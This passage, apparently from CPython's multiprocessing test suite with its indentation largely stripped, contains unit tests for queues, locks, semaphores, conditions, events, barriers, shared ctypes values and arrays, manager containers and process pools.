self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.time()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.time() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
# qsize is not available on all platforms as it
# relies on sem_getvalue
pass
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=1.0))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
def test_closed_queue_put_get_exceptions(self):
for q in multiprocessing.Queue(), multiprocessing.JoinableQueue():
q.close()
with self.assertRaisesRegex(ValueError, 'is closed'):
q.put('foo')
with self.assertRaisesRegex(ValueError, 'is closed'):
q.get()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.time()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.time() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
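# Illustrative sketch, not part of the test suite: the abort/reset
# lifecycle exercised by test_abort_and_reset above, walked through with
# a single-party threading.Barrier so wait() never blocks.
def _demo_barrier_reset():
    b = threading.Barrier(1)
    assert b.wait() == 0           # passes immediately with one party
    b.abort()                      # break the barrier
    assert b.broken
    try:
        b.wait()                   # every wait() now raises...
    except threading.BrokenBarrierError:
        pass
    b.reset()                      # ...until reset() restores it
    assert not b.broken
    assert b.wait() == 0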
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
